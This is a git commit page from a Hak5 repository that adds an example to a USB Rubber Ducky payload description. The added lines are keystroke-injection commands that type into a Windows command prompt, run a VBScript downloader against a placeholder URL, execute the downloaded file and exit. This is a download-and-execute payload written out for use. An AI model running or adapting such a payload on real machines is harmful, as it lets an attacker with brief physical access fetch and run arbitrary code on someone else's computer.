Updated Payload ducky downloader (rdoc)

This commit is contained in:
hak5darren 2012-02-03 18:11:27 -08:00
parent b6825ac333
commit f6a88a01d2
1 changed files with 11 additions and 0 deletions

View File

@ -37,4 +37,15 @@ Description: Opens the command prompt (not as administrator) creates a VBscript
ENTER
STRING exit
ENTER
Example:
...
ENTER
STRING cscript download.vbs http://example.com/fun_windows_executable.exe
ENTER
STRING fun_windows_executable.exe
ENTER
STRING exit
ENTER